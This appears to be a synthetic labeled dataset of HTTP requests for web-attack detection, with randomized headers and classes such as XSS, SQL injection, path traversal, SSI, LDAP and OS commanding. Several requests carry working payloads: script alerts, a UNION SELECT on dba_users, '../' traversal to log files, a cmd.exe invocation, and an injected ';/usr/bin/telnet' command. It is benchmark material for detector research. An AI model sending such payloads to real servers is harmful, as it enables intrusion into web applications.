Accept-Language: o-shzhx;q=0.0, negatt-qeIrd;q=0.5
Cache-Control: no-cache
Client-ip: 1.111.16.222
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="38"
Date: Sun, 02 Nov 08 05:17:58 GMT
ETag: "W15-SZeMZOC6UIv"
Expect: gnetsmnu=tlaou;tnr3Ia5i=Cmw8
From: bniw@mamjmaT.net
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Fri, 25 Jul 08 13:35:25 GMT
If-Match: *
If-None-Match: "G3i8kwl2xodSAkFP"
If-Range: *
Max-Forwards: 286
MIME-Version: 3.4
Pragma: 7pYecmhh='arng'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest opaque="rResoet"
Range: 6-02287,72753-
Referer: http://www.4tr1.uk/hgi1t/lqbalizz.dll
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.2 (Windows; U; Win98 5.5; 5d-s1; rv:6.8.8) Gecko/74240355
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4559x569
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44473
Start - Id: 46812
class: XSS
POST /z9d4OO-iz/rsUt2Hiqsu/ma6o.php4? HTTP/1.0
Content-Length: 179
Content-Language: 3oEyu8,a5N
Content-Encoding: gzip
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: Y3Q4c201cFJlemQ4bGMwdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Mar 06 19:14:33 CET
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: 123.105.7.77
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: iso-8859-2, windows-1258;q=0.4
Accept-Encoding: identity;q=0.2, gzip, gzip;q=0.5, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.151.251.196
Cookie: AEXw4s=8164402844;hnuihYsuelt=ytcownab;HzNethleal=s?iasEoewinntSmperlf ;agr7=ou5a
Cookie2: $Version="66"
Date: Fri, 26 Nov 04 09:47:17 GMT
ETag: "y@tKjzaOGXeONi4MFD"
Expect: 100-continue
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Fri, 13 Aug 04 17:52:43 CET
If-Unmodified-Since: Wed, 08 Jul 09 08:58:31 GMT
If-Match: "IivuB7J5hPJGPwFpQvxu"
If-None-Match: *
If-Range: Thu, 09 Nov 06 12:57:01 UTC
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: http://ioenr2.org/ozaastf.fgf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.3 (Windows; U; Win 9x 5.4; iX-ls; rv:4.8.4) Gecko/66111715
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 7.3 www.r7eFut.css:6
Transfer-Encoding: identity
Upgrade: lRoine/6.1
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

38emetxr=ke&d1fLla6lohyne=ETt7nts&aim=9&Y9.cctu90=o7rw&lnPS.g3hmail=elcIr6ieotzahior&ls=e3gzyL4wkB&rr=<img   src    =  "mocha:[alert  ('letn');]    "   >

End - Id: 46812
Start - Id: 42594
class: SqlInjection
GET /vW1v4AR905o/lirtNYimtg8oetIbft/a4w6@AlK/luaewer/vdGWGyOHd3Vx.png?TEtCBbetween2b=-rY&Mn=0773&ytrs81doispntah=chairs%27+UNION+++++SELECT+++2e4R+FROM+++++dba_users+++++WHERE++name+like+++%27%2525&alRetfdAStdyi=cce HTTP/1.0
Host: www.tr9sfWt.cz
Connection: close
Accept: video/*;q=0.1, video/*, audio/*
Accept-Charset: x-mac-greek;q=0.0, windows-1257, iso-8859-8, iso-8859-6;q=0.1, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 2.110.69.195
Cookie: wealet=798;QmW99QKw82o=n35RQqZQ;sg=nbE3w8lmP-W;llede=959531
Cookie2: $Version="7"
Date: Thu, 12 Jan 06 14:29:29 GMT
ETag: "htxw_uK4_0z1HSarAA"
Expect: siHyt5
From: cnaraI@oSkg.fr
If-Modified-Since: Sat, 03 Mar 07 10:48:10 UTC
If-Unmodified-Since: Fri, 27 Mar 09 14:39:23 GMT
If-Match: "U.eTCu-t1pQUGgMn"
If-None-Match: "NQwH1tO7alEcBHcG"
If-Range: Sun, 24 Apr 05 06:11:36 CET
Max-Forwards: 3
MIME-Version: 2.1
Pragma: aui5=ulh9usOu
Proxy-Authorization: Basic YXJ0MTpkaVNiYW4=
Authorization: Digest qop=auth
Range: 5-,-2176,0697-71705
Referer: http://www.ookAf.net/aipohoea/riez4s.ace
TE: trailers,chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.3 (compatible; egtotlDe; Linux i586; inyse; wmmeoeOq)
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4922x3138
Via: FTP/0.5 117.119.91.234, coD/1.9 www.taae.js, Gex/7.5 97.23.0.126
Transfer-Encoding: deflate
Upgrade: r8az/4.5, ShnfKa/1.6, Ne8h/2.3, uo3m/9.4, baps/3.8
Warning: 765 www.ningpa.jpg "haujs3gtxtukti7rmtti" "Wed, 08 Aug 07 04:54:20 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 89713741
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42594
Start - Id: 46445
class: PathTransversal
POST /bPCIyGi/pMqxqumSOqj.Qt/wa9Seswdqtszi/k5Nt4RMTt8XFq/tcat.KpD5b/9ea1hIe/nodrNsSnsn0pse/h.LjqbRP3KWbH.png? HTTP/1.1
Content-Length: 157
Content-Language: p
Content-Encoding: identity
Content-Location: /eotzi.shtml
Content-MD5: bnNjYWdsem5Ma25kaW91cQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Oct 09 21:29:02 GMT
Last-Modified: Tue, 29 Aug 06 11:30:20 UTC
Host: 123.245.166.7
Connection: close
Accept: */*
Accept-Charset: isiri-3342, iso-8859-7, windows-1251
Accept-Encoding: *
Accept-Language: nLeledeo-iahu6di
Client-ip: 24.184.67.195
Date: Tue, 01 Aug 06 01:07:59 GMT
If-Modified-Since: Thu, 24 Mar 05 15:11:51 GMT
If-Match: "X7uShznpgdSPxiNq5v"
If-None-Match: "PdEq9vCE2T9EY.hZ"
If-Range: *
Max-Forwards: 778
Pragma: tTDilii=sojAjsem
Authorization: Digest opaque="ohEt"
Range: 8-
Referer: /motuTgl/ipgmren/u9tyno/otijte/wgsSwte.mdb
TE: trailers,trailers
User-Agent: ../../../../var/log/access_log%00.html
Via: s10ydo/9.8 158.175.144.180, 6y7hr/9.1 114.213.40.51:1, HTTP/2.7 www.einfq.htm
Upgrade: ag3tre/0.1, gcSii/4.0, npn/0.2, am4soe/1.1, ml6u/2.9
X-Forwarded-For: 112.43.17.203
X-Serial-Number: 3606410233441132391

kxn=d&EBED3s1=345&objectsystem_CZhbBbodyAI=u n&Rn0nilai=3210462145&ryAgr=aB1-1lgWvw&bfromr3=wXBOoQ&EClnwe=auan&silsHae6slrDq=issamftphew5ehsKoa&luctir0dso=88

End - Id: 46445
Start - Id: 39526
class: SSI
GET /.CKL/9JIRqiPygNv1q/Is.tiff?sdv-=%271iDstmpuAn%5D3&eM8eOd3Yty=nyiht5sktsh&nylah=digeni3uemon&baFEj4=21641&ea=w%29sob&0tuEcLsamgaft=95458&edTFemcwei=toryC&gandevbta=huIOXMED_N&oeeg=96746 HTTP/1.0
Host: 59.65.51.119:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.8
Accept-Encoding: gzip;q=0.8
Cookie: havingcusN9K=<!--    #include    virtual="/var/log/httpd/access.log" -->;nncestEdoou=nsy?m;qtsecbssucreuk6=p;ebyazltsyduuv=98384908;Enx9eGe=619149;aY2seOhtaccesU2=syfptf
Cookie2: $Version="892"
Expect: a9oen
If-Range: Wed, 04 Jun 08 02:51:49 UTC
MIME-Version: 0.2
Pragma: no-cache
Referer: /5ic6/3rtt/ttieer/ntog.mpeg
TE: gzip;q=0.0
Trailer: TE
User-Agent: Mozilla/2.3 (Windows; U; Windows NT 9.9; ro-mr; rv:4.1.9) Gecko/18663097

null

End - Id: 39526
Start - Id: 49862
class: XPathInjection
GET /ronreuololdceayeCzl/W62Bih3H08V/40qnbP-0KQ7f7_@TrG/latR7tratpA92/stmGPNcAOVyavXqCtEty/homehavingbR.@inputV@aDv/ib1shANrSlasr/xf1MWtz6D6u85M15JkX/tneoi/ax44itoa/eRFk/sshas.msf?oitpEes=%241eish&Okehsa2Celt=thw&0kc4=ee&tehe9=6bHZE3dgtp&Dcemdeaoa=wrk_oM&8h0ina=%28i+%3C++++count%28o7oHo%2Fchild%3A%3Atext%28%29%29+++++and++j++++%3C++count%28ieoip%2Fchild%3A%3Acomment%28%29%29++and++++k+%3C+++count%28eesle%2Fchild%3A%3A*%29++%29&ifn=%5CnyaiiXt HTTP/1.1
Host: 241.204.34.155
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-4, utf-7, iso-8859-9
Accept-Encoding: compress, compress;q=0.1, compress;q=0.2
Accept-Language: tshuevgl-arngcaq, snaoer-alceekfc;q=0.0, tt-7ne
Cache-Control: max-age=8
Client-ip: 177.96.126.182
Cookie: a9Rei=shul;diyynwtn1tegoa=i&%
Cookie2: $Version="5"
Date: Wed, 18 Jul 07 11:33:36 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: ioqeane
From: eslc7@67owp.net
If-Modified-Since: Thu, 05 May 05 11:47:39 UTC
If-Unmodified-Since: Mon, 16 Aug 04 09:15:08 UTC
If-Match: "LEz15B32Whfmd1dBqn-"
If-None-Match: *
If-Range: "2X3WZxLLuG80Z0F"
Max-Forwards: 2
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: http://hteh1ou.st/1osd/yHsnud/ecviuiig.css
TE: trailers
Trailer: From
User-Agent: Mozilla/2.3 (Windows; U; Windows NT 7.9; t3-mj; rv:6.2.5) Gecko/71208403
UA-CPU: MIPS
UA-Disp: 1964,9946,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 8.5 www.qhwyUdl.js, 0.5 www.ShNMn.tiff:41
Transfer-Encoding: compress
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49862
Start - Id: 39011
class: LdapInjection
POST /8BgTLkjH.wLdnST..rA/fSLxJRXygjE-48M.aZTa/a4r/nto7/tai9bir/qlibxterm8Euhz/s@xZcevqVUI6KzD38/oT7Ld_.tub@w@4H7kqSK/rnXfO.png? HTTP/1.0
Content-Length: 158
Content-Language: trai
Content-Encoding: compress
Content-Location: /gonl/kjrh/0xqa/qupa/8eeMrt3.php
Content-MD5: bXNzdG9vZTFtb24zYXREdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 May 05 19:29:33 GMT
Last-Modified: Sun, 29 Apr 07 19:46:54 UTC
Host: www.6Dcgt.com
Connection: close
Accept: text/html;q=0.7, image/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: wt)(|   (n4=*)
Accept-Language: fef-tu;q=0.2, waeeoedy-53Ntri
Cache-Control: max-age=19
Client-ip: 235.28.101.243
Cookie: in9d=wgetw Bet2t;e5hvaaidrwjqh0p=dAlC_lQP;igee9nq=biaOispd8h i;xmnqSlAnuO=iqSsF;Hhwh=o
Cookie2: $Version="997"
Date: Wed, 30 Jan 08 05:17:48 CET
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: lnxt@thnclr.it
If-Modified-Since: Fri, 16 Feb 07 15:52:01 CET
If-Unmodified-Since: Sat, 23 May 09 11:26:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: 6nrucs het0=Atese
Authorization: NTLM MnNUTjVlbDFubmlkZWx6aW1iZWlkd3JuMm53Z3I3bm1pcG5vbmhseXN0YnluYUl0
Referer: /aiiplLf/tnoheswi/Atnt/juea.js
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: aemo7etiae/0.8.6.9.8
UA-CPU: PowerPC
UA-Disp: 856,7825,8
UA-Color: color16
UA-Pixels: 1899x922
Via: FTP/9.0 www.eri6m.css
Transfer-Encoding: gzip
Upgrade: yuanig/5.9, tImh/5.1
Warning: 717 67.113.202.67:1 "ssl4asgs3riaesdgfrre" 
X-Forwarded-For: 137.88.250.0
X-Serial-Number: 03718234

odo=$raimgbdtv&tzdhaajb=eJkE&7dOg1JS2RM=0wOtRth1R3iB6t8t&XBiz=1903&vxcadEntNc=180212&iydd=r&hser8bdle=wrwi&aoin=491&3vPQvNkq6=wXUU.ylPZj&lAeobeae=V5i8o4tha1

End - Id: 39011
Start - Id: 37518
class: LdapInjection
POST /hnno5usqds9eteo/z8Eopts6bwe1Ma/wr1/e7R-m/al7sDrdsvsfn/oglREafjtei0lgaad6/7U.swf? HTTP/1.0
Content-Length: 39
Content-Language: 0heltt
Content-Encoding: compress
Content-Location: http://4rMNi5.cz/eutsm/3ir7tT/rrdnld8t.jsp
Content-MD5: OXQxY3RlYWxjZEFrc3Jobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 08:08:37 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: www.rurescorne.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity;q=0.0, deflate;q=0.5, identity;q=0.4
Accept-Language: s0dtitia-atBc;q=0.2, otq-r, 3Sehf93-y1O;q=0.7, DlwaeiRr-nOtbhida, 4atoie-s4;q=0.0
Cache-Control: min-fresh=060
Client-ip: 244.64.43.249
Cookie: N84dnnhthangB=73405;pafaPeIrpau=ead;oiEho4ete=4095106;hniAdP1oeu=eFfin5l;oTar=hf
Cookie2: $Version="571"
Date: Thu, 06 Jul 06 09:23:48 CET
ETag: "u34qWBiJNpxKq9A"
Expect: 100-continue
From: 3t4hae@dlnp4fwft.uk
If-Modified-Since: Wed, 27 Apr 05 12:30:48 CET
If-Unmodified-Since: Tue, 05 Dec 06 13:53:45 CET
If-Match: "dNyeVjFdsZkDQO.ri-I9"
If-None-Match: *
If-Range: *
Max-Forwards: 587
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: NTLM NWkxZXN3eXNodGFpb25zTnJnbG5UZTdyaEVhd3Jhc3lyeWVJ
Authorization: NTLM b3MwdHV5eGVpdjJqVDdzZFVvcm95dGVtQW4xangwZ2IxaGhzbXJpdWhwZA==
Range: 0516-7855,069180-,334-
Referer: /quhtor/urrPgAbt/sioz/jhhd2cta/naaaaboe.png
TE: deflate,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/2.9 (compatible; Konqueror/3.2; Linux i586; adea; hvge0etert; tvfnne0gee)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

ae7eRa3ce=hpwn)(|    (zE=*)

End - Id: 37518
Start - Id: 39351
class: SSI
GET /eZqAWXM6D4FU6HUsf/tnhhtoIruoy1uidt/teEtdeord/nfr2hlhl/prgranohta3ui52iaze/lpVi2@n3aJuiDRnGujw9/C7E9fbx1samT0%u/sasb6jsoaon2R6lo/wRSE87PCc2PI9lwh_G/VaRSsGuxCHperli@/trX5JmVJmTD.mdb?tioece2teirqd=%2BroIeqnNen&teso=3327&uWssm9=nejsIaaenetMrut&Cn7u8nc=5&in=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&laalo=h HTTP/1.0
Host: www.8c6seuwLk.de
Connection: qeelQuhn
Accept: audio/x-wav, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 166.96.81.21
Cookie: NtnotAnlonr=hs;sKtlo=92364;bhhruidpimos=9ncpasswda;gliltrtlAejEe=06;Cephtnssedsrc=t14d;rhyvbhen5=0822527581
Cookie2: $Version="50"
Date: Fri, 11 Jan 08 02:13:16 GMT
ETag: "ZigisWD3SleJ7SIJWoF"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Fri, 07 May 04 24:09:46 GMT
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: *
Max-Forwards: 70
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic MkVhaTU6ZTJuVHRo
Authorization: Digest qop=auth-int
Range: 1-35,9436-,-246816
Referer: /Dain/smUbtco.css
TE: chunked,chunked;q=0.9,gzip;q=0.9
Trailer: Host
User-Agent: Mozilla/9.4 (compatible; MSIE 3.1; Win98; eeAaan; isvgni)
UA-CPU: 68000
UA-Disp: 9327,7903,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5277x2991
Via: gfpEe/5.9 www.2pia3ra.jpeg, OoPUYa/3.6 213.183.54.18:8
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 198.159.65.26
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39351
Start - Id: 43903
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.opefttaem.it
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.9, gzip;q=0.7, gzip;q=0.6
Accept-Language: rrc-ii;q=0.2, uui-eeQEen, b-ocutce;q=0.2, hasth-7n3;q=0.6
Cache-Control: max-stale
Client-ip: 196.15.105.143
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Sat, 02 May 09 23:09:19 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: Hxttny
From: hcfetsen@Poenvmrtr.biz
If-Modified-Since: Sat, 31 Jan 09 18:55:30 GMT
If-Unmodified-Since: Mon, 29 Nov 04 07:23:02 UTC
If-Match: "bg@kYjpoQExGydxa4FQ2"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "G9oma_6ANI6gezVOqf"
Max-Forwards: 031
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM c3RnaWhpNGV3a2Vzem1FeWZoSHNlQnJmQ250aWFzaHRUbmpobW9UY3hJZ0c=
Authorization: jaier uicSij=Hxcaxs
Range: -966214,45-83
Referer: http://ebgd.it/itodbn/es8dtu/heAauhes/eenpoe/wkrtIte.htm
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: sLrd/9.5.9
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: identity
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43903
Start - Id: 39720
class: SSI
GET /rnHeH-yYhn/yaiIsiiie/rvwarb3WEDokU/lMsuo54/s2gWJSoI/e3J9qeIhyoyZl/t1mVsMOlaRK5ZzCT/UdpasswdJMadminvtmpvryr8pl/wp/metausrr.cgi?oH0LZdropM1b=%3C%21--+++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&cal=bhiaseneS HTTP/1.1
Host: www.C1i2ksi.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: ojae-h9i;q=0.1, iO-g;q=0.3, eh6R-ssts
Cache-Control: no-store
Client-ip: 201.153.47.247
Cookie: tnc=2;ts5nr9x=128;etr=92789
Cookie2: $Version="57"
Date: Thu, 04 May 06 11:32:03 GMT
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Fri, 25 Jul 08 23:35:46 GMT
If-Unmodified-Since: Sun, 21 Jun 09 03:44:38 GMT
If-Match: ".EbmB.K54B80ugH"
If-None-Match: *
If-Range: "LMELrdm0q4y3CH.e"
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: uoao sivueirq=ctprthen
Range: 61-,98874-5,222224-
Referer: http://t0pd.fr/fylnz.js
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 6.6; mi-st; rv:7.1.2) Gecko/64260875
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 066x3039
Via: 1.7 250.91.146.42:45, 6.4 www.ucuA.shtml:130
Transfer-Encoding: reheys
Upgrade: eoe/8.5, rhosn/0.5, slnwao/7.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39720
Start - Id: 43412
class: OsCommanding
GET /ojt/Dx/trk5lo3d8/arTOrP/ad0Yn/iNtGYDY528VjSPb/914V3z5/CGjdCT65RrlivC/awsP/ytD7xQk.-GcI_66.htm?4pHntrhusmmra=lTdeHiSbuP&az5t=mireiigl6th3&FEKr5IO3shutdown=io6trfr&lnsc6mbz=najtsd+ttbl&sdsmryeatioh7=rplaEistylestdinpga%5C&f2oita=%5C%22+++++%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++++www.nton.com+++++475+++%3B&nhOlE2aoeo=39 HTTP/1.0
Host: www.olnypIeu.gov:80
Connection: wcee
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate;q=0.9, compress;q=0.9, gzip;q=0.0
Accept-Language: 5miv6aun-y, hhS7-o8ch5;q=0.0
Cache-Control: max-stale=57
Client-ip: 5.203.243.165
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Wed, 14 Jun 06 24:33:27 UTC
ETag: "jIrF8GB@jiqHJsgpERvI"
Expect: lcyAtaet=mdtsuia;3eba
From: fikl0E@tRser.fr
If-Modified-Since: Thu, 18 Mar 04 21:47:54 UTC
If-Unmodified-Since: Mon, 05 Nov 07 04:04:25 UTC
If-Match: *
If-None-Match: "dArfG8Dj3X@8.zhP"
If-Range: *
Max-Forwards: 034
MIME-Version: 7.7
Pragma: nronts5=bvrhsdH
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: 6-,47-768842,6146-09
Referer: /ho3rjh.asp
TE: trailers,gzip
Trailer: Expect
User-Agent: ve71gtuati/7.1.1
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43412
Start - Id: 46479
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 219.19.221.13:80
Connection: close
Accept: image/gif
Accept-Charset: windows-1255;q=0.7, euc-jp;q=0.1, hz-gb-2312, x-mac-hebrew, iso-8859-3
Accept-Encoding: 
Accept-Language: Uuphe-htUp, n1in-rs;q=0.4, a-g, az5V-fs
Cache-Control: min-fresh=3619
Client-ip: 98.141.212.240
Cookie: zmTsdadeSitT=Fsxa;rrpwqrbjVWp=eydkdphdydwoeaP;ye0Alt2oreiVj=eg0;_XLFAfA_=1;7r=te
Cookie2: $Version="355"
Date: Thu, 05 Jun 08 14:24:30 UTC
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: 100-continue
From: oeed@ro5sY.uk
If-Modified-Since: Mon, 15 Dec 08 20:22:02 UTC
If-Unmodified-Since: Wed, 11 Feb 04 24:10:12 GMT
If-Match: *
If-None-Match: "d.ez3HAn9X6@MCCrb"
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: /MgxM/ibrbRsm/hdrgRrd/hcei.bin
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: EzeIde (fHy8RF; 0KQ7INd6k2; s4kNykuJsM)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/1.3 16.151.24.152, FTP/5.2 www.oedi.css, loea/5.6 www.lmuilsea.shtml
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3
Warning: 938 www.atHFrEd.css:45 "szdtn5eo4is" "Sat, 06 Dec 08 18:20:14 CET"
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46479
Start - Id: 46989
class: XSS
GET /oie/eadbca5so4setnlos/rYU9ZwusrXt3z.msf?Wnere1ie=bGopt&ekheus=%3Cimg+++++src+++%3D+%22+++++chnaieli%3E+++%22+++++onmouseover++++%3D+++%22+%5Balert+++%28%27stOgaie%27%29%3B%5D+++++%22%3E&In=ikJvrrehe&esfnii0hoe6gMi=maso4iEt&R4VHqp=a96lIinsertdeopDa4&n3eet=tZ%40i.6__&lC=i+si&esrt9jh9t=itsi&awdnrt0dsdsDlsh=elTudsqlria HTTP/1.0
Host: 189.10.41.228
Connection: m2au
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 0.51.121.220
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Tue, 12 May 09 12:04:34 CET
ETag: "f-DBP8aMNHaaIY12Y"
Expect: e5tlod=ailesdjn;e6ent
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Sun, 22 May 05 19:28:50 CET
If-Unmodified-Since: Wed, 05 Nov 08 03:18:00 UTC
If-Match: *
If-None-Match: *
If-Range: "yyDeWKt4A1Y_3RSr5Ay"
Max-Forwards: 28
MIME-Version: 0.5
Pragma: xnS8Cen='f'
Proxy-Authorization: Digest response="cA19Bf43E7BA79aC0dBFc6CE4bcbC03a"
Authorization: oiii irge1a=Lktise
Range: 5-22964
Referer: http://www.Dwce.biz/VmcyhrL/svenmnr4/Zuium.zip
TE: trailers
Trailer: Range
User-Agent: t3n4 (ebGGVmHZ6; stvGPF; sxcfM0cRs; z3P2_e51)
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 238x292
Via: HTTP/0.2 www.iaatrhoe.gif, 8.9 www.esinnndl.shtml, HTTP/7.3 94.117.242.50
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 758 www.hjnzhm8.html "jrtkbu" "Sat, 29 Mar 08 09:44:57 GMT"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

